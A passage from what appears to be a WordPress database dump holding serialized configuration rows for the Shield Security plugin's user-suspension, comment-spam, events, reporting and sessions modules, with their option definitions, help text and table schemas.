specified.\";}s:14:\"manual_suspend\";a:11:{s:3:\"key\";s:14:\"manual_suspend\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/fq\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:9:\"beacon_id\";i:399;s:4:\"name\";s:28:\"Allow Manual User Suspension\";s:7:\"summary\";s:47:\"Manually Suspend User Accounts To Prevent Login\";s:11:\"description\";s:58:\"Users may be suspended by administrators to prevent login.\";}s:13:\"auto_password\";a:11:{s:3:\"key\";s:13:\"auto_password\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/fs\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:9:\"beacon_id\";i:400;s:4:\"name\";s:30:\"Auto-Suspend Expired Passwords\";s:7:\"summary\";s:50:\"Automatically Suspend Users With Expired Passwords\";s:11:\"description\";s:63:\"Suspend login by users and require password reset to unsuspend.\";}s:14:\"auto_idle_days\";a:12:{s:3:\"key\";s:14:\"auto_idle_days\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:9:\"beacon_id\";i:400;s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}s:15:\"auto_idle_roles\";a:11:{s:3:\"key\";s:15:\"auto_idle_roles\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:400;s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}s:27:\"autoadd_sessions_started_at\";a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:22:\"hard_suspended_userids\";a:5:{s:3:\"key\";s:22:\"hard_suspended_userids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:3:{s:29:\"pwned_api_url_password_single\";s:45:\"https://api.pwnedpasswords.com/pwnedpassword/\";s:28:\"pwned_api_url_password_range\";s:37:\"https://api.pwnedpasswords.com/range/\";s:6:\"events\";a:10:{s:16:\"session_notfound\";a:1:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}}s:15:\"session_expired\";a:1:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}}s:12:\"session_idle\";a:1:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}}s:14:\"session_iplock\";a:1:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}}s:16:\"password_expired\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:6:\"notice\";}s:28:\"password_policy_force_change\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:6:\"notice\";}s:21:\"password_policy_block\";a:1:{s:5:\"level\";s:6:\"notice\";}s:19:\"user_hard_suspended\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:5:\"admin\";}s:5:\"level\";s:7:\"warning\";}s:21:\"user_hard_unsuspended\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:5:\"admin\";}s:5:\"level\";s:7:\"warning\";}s:17:\"reg_email_invalid\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"email\";i:1;s:6:\"reason\";}s:5:\"level\";s:7:\"warning\";s:7:\"offense\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510350,'_site_transient_timeout_shield_mod_config_comments_filter','1632920474','no'),(510351,'_site_transient_shield_mod_config_comments_filter','a:7:{s:4:\"slug\";s:15:\"comments_filter\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"comments_filter\";s:4:\"name\";s:13:\"Comments SPAM\";s:12:\"sidebar_name\";s:4:\"SPAM\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:14:\"commentsfilter\";s:7:\"tagline\";s:42:\"Block comment SPAM and retain your privacy\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:50;}s:13:\"admin_notices\";a:1:{s:15:\"akismet-running\";a:4:{s:2:\"id\";s:15:\"akismet-running\";s:12:\"plugin_admin\";s:3:\"yes\";s:16:\"plugin_page_only\";b:1;s:4:\"type\";s:7:\"warning\";}}s:8:\"sections\";a:6:{i:0;a:6:{s:7:\"primary\";b:1;s:4:\"slug\";s:42:\"section_bot_comment_spam_protection_filter\";s:5:\"title\";s:44:\"Automatic Bot Comment SPAM Protection Filter\";s:11:\"title_short\";s:8:\"Bot SPAM\";s:9:\"beacon_id\";i:260;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Blocks 100% of all automated bot-generated comment SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:25:\"section_human_spam_filter\";s:5:\"title\";s:36:\"Human Comment SPAM Protection Filter\";s:11:\"title_short\";s:10:\"Human SPAM\";s:9:\"beacon_id\";i:262;s:7:\"summary\";a:2:{i:0;s:78:\"Purpose - Uses a 3rd party SPAM dictionary to detect human-based comment SPAM.\";i:1;s:176:\"Recommendation - Use of this feature is highly recommend.This tool, unlike other SPAM tools such as Akismet, will not send your comment data to 3rd party services for analysis.\";}}i:2;a:5:{s:4:\"slug\";s:31:\"section_bot_comment_spam_common\";s:5:\"title\";s:37:\"Common Settings For All SPAM Scanning\";s:11:\"title_short\";s:15:\"Common Settings\";s:9:\"beacon_id\";i:152;s:7:\"summary\";a:1:{i:0;s:59:\"Purpose - Settings that apply to all comment SPAM scanning.\";}}i:3;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:9:\"beacon_id\";i:403;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:5:{s:4:\"slug\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:5:\"title\";s:39:\"Enable Module: Comments SPAM Protection\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:257;s:7:\"summary\";a:2:{i:0;s:126:\"Purpose - The Comments Filter can block 100% of automated spam bots and also offer the option to analyse human-generated spam.\";i:1;s:60:\"Recommendation - Keep the Comments Filter feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{s:22:\"enable_comments_filter\";a:11:{s:3:\"key\";s:22:\"enable_comments_filter\";s:7:\"section\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3z\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf04\";s:9:\"beacon_id\";i:257;s:4:\"name\";s:22:\"Enable SPAM Protection\";s:7:\"summary\";s:55:\"Enable (or Disable) The Comments SPAM Protection module\";s:11:\"description\";s:83:\"Un-Checking this option will completely disable the Comments SPAM Protection module\";}s:25:\"trusted_commenter_minimum\";a:11:{s:3:\"key\";s:25:\"trusted_commenter_minimum\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"default\";i:1;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:152;s:4:\"name\";s:25:\"Trusted Commenter Minimum\";s:7:\"summary\";s:63:\"Minimum Number Of Approved Comments Before Commenter Is Trusted\";s:11:\"description\";s:117:\"Specify how many approved comments must exist before a commenter is trusted and their comments are no longer scanned.\";}s:18:\"trusted_user_roles\";a:11:{s:3:\"key\";s:18:\"trusted_user_roles\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:152;s:4:\"name\";s:13:\"Trusted Users\";s:7:\"summary\";s:54:\"Don\'t Scan Comments For Users With The Following Roles\";s:11:\"description\";s:124:\"Shield doesn\'t normally scan comments from logged-in or registered users. Specify user roles here that shouldn\'t be scanned.\";}s:20:\"enable_antibot_check\";a:10:{s:3:\"key\";s:20:\"enable_antibot_check\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/k1\";s:9:\"link_blog\";s:19:\"https://shsec.io/jo\";s:9:\"beacon_id\";i:427;s:4:\"name\";s:24:\"AntiBot Detection Engine\";s:7:\"summary\";s:41:\"Use Experimental AntiBot Detection Engine\";s:11:\"description\";s:68:\"Use Shield\'s AntiBot Detection Engine In-Place of GASP Bot checking.\";}s:32:\"comments_default_action_spam_bot\";a:11:{s:3:\"key\";s:32:\"comments_default_action_spam_bot\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:4:\"spam\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:9:\"link_info\";s:19:\"https://shsec.io/6j\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:260;s:4:\"name\";s:11:\"SPAM Action\";s:7:\"summary\";s:53:\"How To Categorise Comments When Identified To Be SPAM\";s:11:\"description\";s:118:\"When a comment is detected as being SPAM from an automatic bot, the comment will be categorised based on this setting.\";}s:31:\"google_recaptcha_style_comments\";a:11:{s:3:\"key\";s:31:\"google_recaptcha_style_comments\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/e4\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:7:\"CAPTCHA\";s:7:\"summary\";s:47:\"Enable CAPTCHA To Protect Against SPAM Comments\";s:11:\"description\";s:107:\"You can choose the CAPTCHA display format that best suits your site, including the newer Invisible CAPTCHA.\";}s:31:\"enable_comments_gasp_protection\";a:10:{s:3:\"key\";s:31:\"enable_comments_gasp_protection\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3n\";s:9:\"link_blog\";s:19:\"https://shsec.io/2n\";s:9:\"beacon_id\";i:401;s:4:\"name\";s:15:\"GASP Protection\";s:7:\"summary\";s:22:\"Block Bot Comment SPAM\";s:11:\"description\";s:121:\"Taking the lead from the original GASP plugin for WordPress, we have extended it to include advanced spam-bot protection.\";}s:33:\"enable_comments_human_spam_filter\";a:10:{s:3:\"key\";s:33:\"enable_comments_human_spam_filter\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/57\";s:9:\"link_blog\";s:19:\"https://shsec.io/9w\";s:9:\"beacon_id\";i:262;s:4:\"name\";s:17:\"Human SPAM Filter\";s:7:\"summary\";s:48:\"Enable (or Disable) The Human SPAM Filter module\";s:11:\"description\";s:145:\"Scans the content of WordPress comments for keywords that are indicative of SPAM and marks the comment according to your preferred setting below.\";}s:34:\"comments_default_action_human_spam\";a:8:{s:3:\"key\";s:34:\"comments_default_action_human_spam\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"0\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:4:\"name\";s:11:\"SPAM Action\";s:7:\"summary\";s:54:\"How To Categorise Comments When Identified To Be SPAM\'\";s:11:\"description\";s:119:\"When a comment is detected as being SPAM from a human commenter, the comment will be categorised based on this setting.\";}s:23:\"custom_message_checkbox\";a:11:{s:3:\"key\";s:23:\"custom_message_checkbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:23:\"Custom Checkbox Message\";s:7:\"summary\";s:63:\"If you want a custom checkbox message, please provide this here\";s:11:\"description\";s:50:\"You can customise the message beside the checkbox.\";}s:20:\"custom_message_alert\";a:11:{s:3:\"key\";s:20:\"custom_message_alert\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:20:\"Custom Alert Message\";s:7:\"summary\";s:60:\"If you want a custom alert message, please provide this here\";s:11:\"description\";s:101:\"This alert message is displayed when a visitor attempts to submit a comment without checking the box.\";}s:27:\"custom_message_comment_wait\";a:11:{s:3:\"key\";s:27:\"custom_message_comment_wait\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:19:\"Custom Wait Message\";s:7:\"summary\";s:74:\"If you want a custom submit-button wait message, please provide this here.\";s:11:\"description\";s:111:\"Where you see the \'%s\' this will be the number of seconds. You must ensure you include 1, and only 1, of these.\";}s:29:\"custom_message_comment_reload\";a:11:{s:3:\"key\";s:29:\"custom_message_comment_reload\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:21:\"Custom Reload Message\";s:7:\"summary\";s:90:\"If you want a custom message when the comment token has expired, please provide this here.\";s:11:\"description\";s:81:\"This message is displayed on the submit-button when the comment token is expired.\";}s:17:\"comments_cooldown\";a:5:{s:3:\"key\";s:17:\"comments_cooldown\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";i:10;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";}s:16:\"human_spam_items\";a:4:{s:3:\"key\";s:16:\"human_spam_items\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:6:{i:0;s:11:\"author_name\";i:1;s:12:\"author_email\";i:2;s:15:\"comment_content\";i:3;s:3:\"url\";i:4;s:10:\"ip_address\";i:5;s:10:\"user_agent\";}}}s:11:\"definitions\";a:3:{s:15:\"comments_expire\";i:1800;s:24:\"url_spam_blacklist_terms\";s:89:\"https://raw.githubusercontent.com/splorp/wordpress-comment-blacklist/master/blacklist.txt\";s:6:\"events\";a:5:{s:18:\"comment_spam_block\";a:3:{s:5:\"level\";s:6:\"notice\";s:4:\"stat\";b:0;s:7:\"offense\";b:1;}s:18:\"spam_block_antibot\";a:0:{}s:14:\"spam_block_bot\";a:0:{}s:20:\"spam_block_recaptcha\";a:0:{}s:16:\"spam_block_human\";a:1:{s:12:\"audit_params\";a:2:{i:0;s:4:\"word\";i:1;s:3:\"key\";}}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510352,'_site_transient_timeout_shield_mod_config_events','1632920474','no'),(510353,'_site_transient_shield_mod_config_events','a:6:{s:10:\"properties\";a:12:{s:4:\"slug\";s:6:\"events\";s:4:\"name\";s:6:\"Events\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:6:\"events\";s:7:\"tagline\";s:37:\"Collection of plugin events and stats\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:36:\"section_enable_plugin_feature_events\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Module: Events\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:51:\"Recommendation - Keep the Events feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{s:13:\"enable_events\";a:9:{s:3:\"key\";s:13:\"enable_events\";s:7:\"section\";s:36:\"section_enable_plugin_feature_events\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Enable Events\";s:7:\"summary\";s:37:\"Enable (or Disable) The Events module\";s:11:\"description\";s:65:\"Un-Checking this option will completely disable the Events module\";}}s:11:\"definitions\";a:3:{s:10:\"db_classes\";a:1:{s:6:\"events\";s:65:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Events\\Handler\";}s:15:\"db_table_events\";a:2:{s:4:\"slug\";s:6:\"events\";s:11:\"cols_custom\";a:2:{s:5:\"event\";s:54:\"varchar(50) NOT NULL DEFAULT \'none\' COMMENT \'Event ID\'\";s:5:\"count\";s:51:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Total\'\";}}s:17:\"events_table_name\";s:6:\"events\";}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510354,'_site_transient_timeout_shield_mod_config_reporting','1632920474','no'),(510355,'_site_transient_shield_mod_config_reporting','a:7:{s:10:\"properties\";a:13:{s:4:\"slug\";s:9:\"reporting\";s:4:\"name\";s:9:\"Reporting\";s:11:\"storage_key\";s:9:\"reporting\";s:7:\"tagline\";s:16:\"Shield Reporting\";s:12:\"show_central\";b:1;s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:16:\"tracking_exclude\";b:1;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:12:\"Stats (beta)\";s:4:\"slug\";s:14:\"stats-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"stats-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"reports\";}}}s:8:\"sections\";a:3:{i:0;a:6:{s:4:\"slug\";s:15:\"section_timings\";s:7:\"primary\";b:1;s:5:\"title\";s:18:\"Report Frequencies\";s:11:\"title_short\";s:18:\"Report Frequencies\";s:9:\"beacon_id\";i:136;s:7:\"summary\";a:1:{i:0;s:105:\"Purpose - Choose the most appropriate frequency to receive alerts from Shield according to your schedule.\";}}i:1;a:5:{s:4:\"slug\";s:28:\"section_enable_mod_reporting\";s:5:\"title\";s:22:\"Enable Module: Reports\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:136;s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:54:\"Recommendation - Keep the Reporting feature turned on.\";}}i:2;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:3:{s:16:\"enable_reporting\";a:11:{s:3:\"key\";s:16:\"enable_reporting\";s:7:\"section\";s:28:\"section_enable_mod_reporting\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hb\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:136;s:4:\"name\";s:16:\"Enable Reporting\";s:7:\"summary\";s:40:\"Enable (or Disable) The Reporting module\";s:11:\"description\";s:68:\"Un-Checking this option will completely disable the Reporting module\";}s:15:\"frequency_alert\";a:11:{s:3:\"key\";s:15:\"frequency_alert\";s:7:\"section\";s:15:\"section_timings\";s:4:\"type\";s:6:\"select\";s:7:\"default\";s:5:\"daily\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:6:\"hourly\";s:4:\"text\";s:6:\"Hourly\";}i:2;a:2:{s:9:\"value_key\";s:5:\"daily\";s:4:\"text\";s:5:\"Daily\";}i:3;a:2:{s:9:\"value_key\";s:6:\"weekly\";s:4:\"text\";s:6:\"Weekly\";}}s:9:\"link_info\";s:19:\"https://shsec.io/h9\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:233;s:4:\"name\";s:15:\"Alert Frequency\";s:7:\"summary\";s:45:\"How Often Should You Be Sent Important Alerts\";s:11:\"description\";s:86:\"Decide when you should be sent important and critical alerts about your site security.\";}s:14:\"frequency_info\";a:11:{s:3:\"key\";s:14:\"frequency_info\";s:7:\"section\";s:15:\"section_timings\";s:4:\"type\";s:6:\"select\";s:7:\"default\";s:6:\"weekly\";s:13:\"value_options\";a:6:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:6:\"hourly\";s:4:\"text\";s:6:\"Hourly\";}i:2;a:2:{s:9:\"value_key\";s:5:\"daily\";s:4:\"text\";s:5:\"Daily\";}i:3;a:2:{s:9:\"value_key\";s:6:\"weekly\";s:4:\"text\";s:6:\"Weekly\";}i:4;a:2:{s:9:\"value_key\";s:8:\"biweekly\";s:4:\"text\";s:9:\"Bi-Weekly\";}i:5;a:2:{s:9:\"value_key\";s:7:\"monthly\";s:4:\"text\";s:7:\"Monthly\";}}s:9:\"link_info\";s:19:\"https://shsec.io/ha\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:232;s:4:\"name\";s:14:\"Info Frequency\";s:7:\"summary\";s:48:\"How Often Should You Be Sent Information Reports\";s:11:\"description\";s:93:\"Decide when you should be sent non-critical information and reports about your site security.\";}}s:11:\"definitions\";a:3:{s:10:\"db_classes\";a:1:{s:7:\"reports\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Reports\\Handler\";}s:16:\"db_table_reports\";a:4:{s:4:\"slug\";s:7:\"reports\";s:10:\"autoexpire\";i:30;s:11:\"cols_custom\";a:3:{s:3:\"rid\";s:55:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Report ID\'\";s:4:\"type\";s:52:\"varchar(3) NOT NULL DEFAULT \'\' COMMENT \'Report Type\'\";s:9:\"frequency\";s:67:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Report Interval/Frequency\'\";}s:15:\"cols_timestamps\";a:2:{s:15:\"interval_end_at\";s:22:\"Reporting Interval End\";s:7:\"sent_at\";s:11:\"Report Sent\";}}s:6:\"events\";a:2:{s:16:\"report_generated\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:4:\"type\";i:1;s:8:\"interval\";}s:5:\"level\";s:5:\"debug\";}s:11:\"report_sent\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:6:\"medium\";}s:5:\"level\";s:5:\"debug\";}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510356,'_site_transient_timeout_shield_mod_config_sessions','1632920474','no'),(510357,'_site_transient_shield_mod_config_sessions','a:6:{s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"sessions\";s:4:\"name\";s:8:\"Sessions\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:8:\"sessions\";s:7:\"tagline\";s:13:\"User Sessions\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:19:\"auto_load_processor\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Enable Module: Sessions\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:44:\"Purpose - Creates and Manages User Sessions.\";i:1;s:53:\"Recommendation - Keep the Sessions feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:2:{s:15:\"enable_sessions\";a:9:{s:3:\"key\";s:15:\"enable_sessions\";s:7:\"section\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Sessions\";s:7:\"summary\";s:39:\"Enable (or Disable) The Sessions module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Sessions module\";}s:27:\"autoadd_sessions_started_at\";a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:8:\"sessions\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Session\\Handler\";}s:19:\"sessions_table_name\";s:8:\"sessions\";s:17:\"db_table_sessions\";a:3:{s:4:\"slug\";s:8:\"sessions\";s:11:\"cols_custom\";a:5:{s:10:\"session_id\";s:31:\"varchar(32) NOT NULL DEFAULT \'\'\";s:11:\"wp_username\";s:32:\"varchar(255) NOT NULL DEFAULT \'\'\";s:2:\"ip\";s:31:\"varchar(60) NOT NULL DEFAULT \'\'\";s:7:\"browser\";s:31:\"varchar(32) NOT NULL DEFAULT \'\'\";s:17:\"last_activity_uri\";s:24:\"text NOT NULL DEFAULT \'\'\";}s:15:\"cols_timestamps\";a:3:{s:12:\"logged_in_at\";s:15:\"Session 